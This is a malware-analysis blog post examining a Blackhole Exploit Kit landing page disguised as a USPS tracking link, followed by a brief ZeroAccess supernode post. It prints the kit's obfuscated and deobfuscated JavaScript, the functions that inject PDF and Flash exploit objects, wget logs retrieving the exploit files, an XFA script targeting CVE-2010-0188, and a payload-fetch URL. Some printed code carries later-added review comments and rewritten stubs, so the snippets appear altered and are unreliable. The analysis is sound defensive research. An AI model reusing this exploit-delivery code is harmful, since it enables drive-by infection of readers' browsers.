Tuesday, February 26, 2013

BHEK 2 plugin detect 0.7.9

BHEK 2.x with Plugin detect 0.7.9


I saw a tweet about a VirusTotal 0/45 result and a urlquery.net link, so I got curious:

At first glance this looks like a BHEK case to me. This is my first real go at analyzing BHEK, so bear with me...

The url from urlquery: hxxp://www5-usps.com/nbh/sends/track.php resolving to 46.166.179.122
Virustotal report 0/31

Let's go and fetch it:

--2013-02-26 23:53:55--  hxxp://www5-usps.com/nbh/sends/track.php
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 22:58:09 GMT
  Content-Type: text/html
  Connection: close
  X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php'

     0K .......... .......... .......... .......... ..........  196K
    50K .......... .......... .......... .......... .......... 74.3K
   100K .........                                              1.09M=0.9s

2013-02-26 23:53:58 (117 KB/s) - `track.php' saved [112216]

This gives us a page with obfuscated JavaScript on it: 

(Full page at pastebin)
 language="javascript">var a = "112:1OO:112:1OO:61:123:11(:1O1:114:115:1O5:111:11O:5(:34:4(:46:55:46:57:34:44:11O:97:1O9:1O1:5(:34:112:1OO:112:1OO:34:44:1O4:97:11O:1OO:1O(:1O1:114:5(:1O2:117:11O:99:116:1O5:111:11O:4O:99:44:9(:44:97:41:123:114:1O1:116:117:114:11O:32:1O2:117:11O:99:116:1O5:111:11O:4O:41:123:99:4O:9(:44:97:41:125:125:44:111:112:1O1:11O:(4:97:1O3:5(:34:6O:34:44:1O5:115:6(:1O1:1O2:1O5:11O:1O1:1OO:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:33:61:34:117:11O:1OO:1O1:1O2:1O5:11O:1O1:1OO:34:125:44:1O5:115:65:114:114:97:121:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:47:97:114:114:97:121:47:1O5:41:46:116:1O1:115:116:4O:79:9(:1O6:1O1:99:116:46:112:114:111:116:111:116:121:112:1O1:46:116:111:(3:116:114:1O5:11O:1O3:46:99:97:1O(:1O(:4O:9(:41:41:125:44:1O5:115:7O:117:11O:99:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:1O2:117:11O:99:116:1O5:111:11O:34:125:44:1O5:115:(3:116:114:1O5:11O:1O3:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:125:44:1O5:115:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:11O:117:1O9:9(:1O1:114:34:125:44:1O5:115:(3:116:114:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:3(:3(:4O:47:92:1OO:47:41:46:116:1O1:115:116:4O:9(:41:41:125:44:1O3:1O1:116:7(:117:1O9:(2:1O1:1O3:12O:5(:47:91:92:1OO:93:91:92:1OO:92:46:92:95:44:45:93:42:47:44:115:112:1O(:1O5:116:7(:117:1O9:
:
:

Let's run it through jsbeautifier.org to clean it up:

(Fully beautified page at pastebin)
if (window.document)
            // Decoder for the obfuscated payload above: walks the global `a`
            // and appends String.fromCharCode(a[i]) to the global `s`. The
            // method name is assembled from fragments plus the global `ff`
            // (assigned "ode" in a catch block further down) so the string
            // "fromCharCode" never appears literally in the page — a common
            // signature-evasion trick. If `ff` has not been set, the lookup
            // yields undefined and this throws.
            // NOTE(review): `a` is pasted as one ":"-separated string;
            // presumably it is split into an array before c() runs — confirm
            // against the full beautified page.
            function c() {
                for (i = 0, s = ""; i < a.length; i++) {
                    s += String["f" + "r" + "o" + "mCh" + "arC" + ff](a[i]);
                }
            }
            if (window.document) csq = function () {
                z(s);
            };
            try {
                document.body ^= 2
            } catch (q) {
                xc = 1;
                if (q) e = eval;
                rr = "rep" + "la" + "ce";
                doc = document;
            }
            try {
                doc["body"] %= 2
            } catch (q) {
                ff = "ode";
            }
            try {
                gewh = 1;
            } catch (sav) {
                xc = false;
            }
            vvz = "\\(";
        
       
        
            var a = "112:100:112:100:61:123:11(:101:114:115:105:111

Decoding this gives us the following most interesting parts:

wepawet link

Hello plugin detect 0.7.9

pdpd = {
    version: "O.7.9",
    name: "pdpd",
    handler: function(c, b, a) {
        return function() {
            c(b, a)
        }
:
:

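/**
 * Encodes a string as colon-separated base-33 character codes.
 *
 * This is the kit's query-parameter encoder: each UTF-16 code unit of `s`
 * is written in radix 33 (for example "8" -> 56 -> "1n") and the pieces are
 * joined with ":". It is what turns x("8fa62") into the "1n:33:2v:1l:1h"
 * seen in the fetched URLs further down, so running it over the literal
 * arguments in p1/p2/f1 reproduces the payload URLs for analysis.
 *
 * Differences from the pasted original: the loop counter started at the
 * letter `O` (an undefined name, a zero-for-O artefact of the paste) instead
 * of the digit 0, and `d`, `i`, `k` were implicit globals, which throw in
 * strict mode; all three are now block-scoped locals.
 *
 * @param {string} s - the string to encode
 * @returns {string} colon-separated base-33 codes; "" for an empty input
 */
function x(s) {
  const parts = [];
  // Iterate by UTF-16 code unit (not code point) to match charCodeAt().
  for (let i = 0; i < s.length; i++) {
    parts.push(s.charCodeAt(i).toString(33));
  }
  return parts.join(":");
}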
:
:

/** Detection stub: unconditionally reports true. */
function j1() {
  const detected = true;
  return detected;
}
/** Detection stub: unconditionally reports true. */
function j2() {
  const detected = true;
  return detected;
}
// First PDF delivery path. Appends an <object type="application/pdf"> to the
// body whose data URL is the same track.php endpoint the page came from,
// which makes the browser's PDF plugin open whatever the server returns.
// The query string is the kit's encoded parameter set: x("8fa62") and
// x("ymg") are fixed tokens, "3O:3O:33:..." is a pre-encoded constant (this
// paste shows zeros as the letter O; the fetched URLs below read "30:30:33"),
// and `pie` carries the detected Reader version taken from the global
// `pdfver` (defined elsewhere in the decoded page). The fetch logs further
// down return different files for different `pie` values.
function p1() {
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?wxgnkiyn=" + x("8fa62") + "&ynis=" + x("ymg") + "&sspcu=3O:3O:33:1k:1h:31:2v:1n:1l:1h&pie=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}
// Second PDF delivery path; same mechanism as p1 but with a different set of
// parameter names and the token x("j") ("37") in place of x("ymg"), which is
// how the server tells the two PDF variants apart (the fetch logs below show
// the p2 requests answered with filename=c516a.pdf / 6ed41.pdf / 7453e.pdf).
// `yphqibh` carries the Reader version from the global `pdfver`.
function p2() {
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?zaigqae=" + x("8fa62") + "&xtdgebs=" + x("j") + "&qbthq=3O:3O:33:1k:1h:31:2v:1n:1l:1h&yphqibh=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}
/** Delivery stub: never fires, always returns false. */
function p3() {
  const fired = false;
  return fired;
}
// Flash delivery path. Builds the payload URL (same track.php endpoint, with
// Flash-specific parameter names and a long hex `info` value passed through
// unencoded), then injects an <object>/<embed> pair for the Flash Player
// ActiveX control via innerHTML on a freshly appended <span>. Both the
// <param name='movie'> and the <embed src> point at that URL, so the SWF is
// loaded whichever element the browser honours; allowNetworking='all' lets
// the loaded SWF make network requests. Zeros appear as the letter O in this
// paste ("6OO", "4OO", "...OOOO").
function f1() {
    var oSpan = document.createElement("span");
    document.body.appendChild(oSpan);
    var url = "/nbh/sends/track.php?pbf=" + x("8fa62") + "&jsttgj=" + x("nikbgp") + "&gbtov=3O:3O:33:1k:1h:31:2v:1n:1l:1h&info=O2e6b1525353caa8ad5555554daf57575452ac31b4b5afb531bOaa5534b73153ac55533O36b4ac51b252ca3556b1cf4f7e7af15O6acc";
    oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-44455354OOOO' id='asd' width='6OO' height='4OO' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='" + url + "' /><embed src='" + url + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
/** Delivery stub: never fires, always returns false. */
function ff2() {
  const fired = false;
  return fired;
}
:
:

We now have the functions that make the requests for the PDF and Flash files.

There is little obfuscation left now, so by running the x() function to produce the missing strings, we can build the full URLs needed to fetch the PDF files and the Flash file. These parameters are required to retrieve the files that will exploit our client.


Let's fetch the exploit files:


Adobe 8.0 as input to p1():

MD5: 8410e4eb83d2c12ae56edd8aab9ef139
Virustotal report 21/46

--2013-02-27 00:01:47--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:06:04 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 9874
  Content-Disposition: inline; filename=c516a.pdf
Length: 9874 (9.6K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l'

     0K .........                                             100%  114K=0.08s


2013-02-27 00:01:52 (114 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' saved [9874/9874]


Adobe 8.0 as input to p1():

--2013-02-27 00:14:32--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:18:49 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20065
  ETag: "c6c16a19dfb3210cd8d680eef3a24429"
  Last-Modified: Tue, 26 Feb 2013 23:17:43 GMT
  Accept-Ranges: bytes
Length: 20065 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f'

     0K .......... .........                                  100% 91.2K=0.2s

2013-02-27 00:14:37 (91.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' saved [20065/20065]


Adobe 8.1 as input to p1():

--2013-02-27 00:15:39--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:19:59 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20053
  ETag: "e03b272d4c3f1b6dd29e5ae5c4e69c28"
  Last-Modified: Tue, 26 Feb 2013 23:18:52 GMT
  Accept-Ranges: bytes
Length: 20053 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g'

     0K .......... .........                                  100%  117K=0.2s

2013-02-27 00:15:47 (117 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' saved [20053/20053]


Adobe 7.0 as input to p1():

--2013-02-27 00:19:33--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:23:49 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20041
  ETag: "dca06b8cac6d323ef4819ebb35713352"
  Last-Modified: Tue, 26 Feb 2013 23:22:43 GMT
  Accept-Ranges: bytes
Length: 20041 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f'

     0K .......... .........                                  100% 88.2K=0.2s

2013-02-27 00:19:37 (88.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' saved [20041/20041]


Adobe 8.0 as input to p2():

MD5: 4bd05eb8bb678618fc3d54ed53ec66b2
Virustotal report 21/46
--2013-02-27 00:23:46--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:27:59 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 10838
  Content-Disposition: inline; filename=6ed41.pdf
Length: 10838 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f'

     0K ..........                                            100% 83.6K=0.1s

2013-02-27 00:23:47 (83.6 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' saved [10838/10838]


Adobe 9.0 as input to p2():

MD5: 50b9fb749ec9226be53ed108667c2e19
Virustotal report 21/46
--2013-02-27 00:26:30--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:30:53 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 10815
  Content-Disposition: inline; filename=7453e.pdf
Length: 10815 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f'

     0K ..........                                            100%  123K=0.09s

2013-02-27 00:26:41 (123 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' saved [10815/10815]



Flash f1():

MD5: db2d3584fdbacdb7fd58fadc558144ae
Virustotal report 10/46





--2013-02-27 00:31:24--  hxxp://www5-usps.com/nbh/sends/track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:35:43 GMT
  Content-Type: text/html
  Connection: close
  X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc'

     0K ..                                                      121M=0s

2013-02-27 00:31:32 (121 MB/s) - `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' saved [2671]

Happy to get the files :) but no time to analyze them further at the time :(

Update 2013-02-28

I got time to look more into this case, so let's start with the PDFs:

Let's see if the files hide something we could look into more closely,
c516a.pdf:

statistics:
Comment: 4
XREF: 1
Trailer: 0
StartXref: 0
Indirect object: 26
  11: 52, 6, 18, 19, 20, 21, 22, 28, 31, 32, 48
 /Annot 1: 15
 /Catalog 1: 1
 /EmbeddedFile 6: 41, 42, 99999, 44, 45, 46
 /Font 3: 14, 27, 29
 /FontDescriptor 1: 30
 /Page 1: 8
 /Pages 1: 2
 /Pattern 1: 13

Let's look more closely at object 99999


obj 99999 0
Type: /EmbeddedFile
 Referencing: 
 Contains stream
 <</Length
1313 / Filter / FlateDecode / Type / EmbeddedFile >>

<< /Length 1313
   /Filter / FlateDecode / Type / EmbeddedFile >>

< template > < subform name = "form1"
layout = "tb"
locale = "ru_RU" > < pageSet > < pageArea > < contentArea h = "10.5in"
w = "8in"
x = "0.25in"
y = "0.25in" > < /contentArea><medium long="11in" short="8.5in" stock="letter"></medium > < /pageArea></pageSet > < subform h = "10.5in"
w = "8in" > < field h = "98.425mm"
name = "ImageField1"
w = "28.575mm"
x = "95.25mm"
y = "19.05mm" > < ui > < imageEdit > < /imageEdit></ui > < event activity = "initialize"
xmlns: xfa = "http://testset.com" > < xfa: script contentType = 'application/x-javascript' > p = parseIn & #116;;
a= & quot;
53 * * ^ !@# * * 48 * * 4P * * 1L * * 4N * * ^ !@# * * 48 * * 4B * * 4B * * 4G * * ^ !@# * * 4L * * 4E * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 49 * * ^ !@# * * 49 * * 49 * * 27 * * 1L * * ^ !@# * * 4A * * 4A * * 4A * * 27 * * ^ !@# * * 1L * * 4B * * 4B * * 4B * * ^ !@# * * 27 * * 1L * * 4C * * 4C * * ^ !@# * * 4C * * 27 * * 1L * * 4D * * ^ !@# * * 4D * * 4D * * 27 * * 1L * * ^ !@# * * 4E * * 4E * * 4E * * 27 * * ^ !@# * * 1L * * 4F * * 4F * * 4F * * ^ !@# * * 2M * * 53 * * 48 * * 4P * * ^ !@# * * 1L * * 4N * * 4M * * 4G * * ^ !@# * * 4L * * 51 * * 4C * * 4P * * ^ !@# * * 50 * * 46 * * 48 * * 27 * * ^ !@# * * 1L * * 4G * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 55 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 56 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 46 * * ^ !@# * * 4J * * 2C * * 2O * * 1N * * ^ !@# * * 2F * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2G * * 2C * * 2I * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 4D * * 2H * * 2E * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 48 * * 2E * * 4C * * 49 * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 2B * * 2D * * 2B * * ^ !@# * * 2J * * 2D * * 2F * * 48 * * ^ !@# * * 2H * * 4C * * 2D * * 4D * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2D * * 2H * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 
2B * * 2B * * 2B * * ^ !@# * * 2C * * 2D * * 2E * * 2K * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2H * * 2F * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2B * * 2B * * 2F * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 1N * * 26 * * 1N * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 4D * * ^ !@# * * 2H * * 49 * * 2H * * 4B * * ^ !@# * * 2H * * 2K * * 2I * * 2C * * ^ !@# * * 2H * * 4B * * 2E * * 2G * * ^ !@# * * 2I * * 2K * * 2I * * 2B * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2I * * 2C * * 2I * * 2D * * ^ !@# * * 2I * * 2H * * 2H * * 2C * * ^ !@# * * 2H * * 48 * * 2H * * 4B * * ^ !@# * * 2E * * 2H * * 2I * * 2F * * ^ !@# * * 2H * * 2F * * 2H * * 4C * * ^ !@# * * 2H * * 4D * * 2H * * 2H * * ^ !@# * * 2D * * 2K * * 2H * * 2C * * ^ !@# * * 2E * * 4B * * 2E * * 2C * * ^ !@# * * 2I * * 2E * * 2I * * 2E * * ^ !@# * * 2H * * 4C * * 2H * * 2J * * ^ !@# * * 2H * * 2D * * 2H * * 2H * * ^ !@# * * 2D * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4C * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2H * * ^ !@# * * 2I * * 2D * * 2E * * 48 * * ^ !@# * * 2E * * 2C * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2J * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 49 * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2E * * ^ !@# * * 2E * * 2E * * 2E * * 48 * * ^ !@# * * 2E * * 2B * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2B * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 2F * * 2I * * 2B * * ^ !@# * * 2I * * 2I * * 2H * * 48 * * ^ !@# * * 2H * * 2E * * 2I * * 2F * * ^ !@# * * 2I * * 2B * * 2I * * 2J * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4A * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ 
!@# * * 2E * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2D * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 4B * * 2H * * 2E * * ^ !@# * * 2H * * 48 * * 2I * * 4D * * ^ !@# * * 2E * * 2B * * 2I * * 2J * * ^ !@# * * 2H * * 2B * * 2I * * 4C * * ^ 
:
:
a = a.replace.apply(a, [/\^!@#/g, & quot; & quot;]);
a = a.replace.apply(a, [/\*\*/g, & quot; & quot;]);
s = [];
for (i = 0; i & lt; a. & #108;ength;i+= 2) {
    s.push(p(a. & #115;ubstr(i,2),26)-15);
}
ss= String. & #102;romCharCode;
if(event.target.info.Authors= == null) if (event.target.filesize & gt;
    (16000, 9000)) {
        k = ss.apply(String, s);
        q = "e" + ss.apply(String, [0x76, 0x61]);
        event.target[q + "l"]( & #107;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>



Pretty ugly stuff here: JavaScript that tries to exploit CVE-2010-0188.
After exploiting the client, it will try to fetch an additional payload from

hxxp://www5-usps.com/nbh/sends/track.php?jggg=32:1h:1l:1l:1j&ccb=30:30:33:1k:1h:31:2v:1n:1l:1h&qjqjo=1i&madrmk=fsjuhw&aazds=seyv

Since I left this alone for a couple of days the site was, as expected, no longer serving me anything, so no additional payload for me.

WepaWet report here


The same method was used for the other PDFs:


6ed41.pdf -> Wepawet
7453e.pdf -> Wepawet


No Java?

I had expected some Java stuff to hit me from the EK as well. But since I went straight for the plugin detect stuff, I missed this code:


<applet code="&#OO1O4;&#OO119;" archive="/nbh/sends/track.php">
            <param value="Dyy3Ojj" name="val" />
            <param value="fa" name="earth" />
            <param name="prime" value="___4mKi3iw%tOjo?DjieoMijylV%qw3D3xA.b1hO6DO6-O6-O6CRVeb1fO1fO11O6qO6DO16OhvO6oO6-O6DRCb6.RVObqRAlb-" />
        </applet>

Too late to fetch the jar as well.

Wednesday, February 20, 2013

Zeroaccess supernodes mapped - part I

Zeroaccess supernodes part I


NB! There are approximately 40.000 nodes, so the mapping will be slow.

Or it would have been, but my google_maps_api_javascript fu failed me, so you only get a small taste plotted on the nice Google Maps.
However here is the full list at pastebin part_I and part_II

This is an overview of ZeroAccess supernodes tracked in the last three weeks.
These nodes have been online during this period and confirmed infected.

These nodes are the backbone of the ZeroAccess network; other bots contact them to stay updated. They also communicate with each other, mainly on UDP port 16464. They are called supernodes because other nodes can communicate with them.

For more info on ZeroAccess check this post

Please note that IP addresses do change over time so some of these might not be alive at the time of publishing.

A good source for ZeroAccess statistics over at malware-lu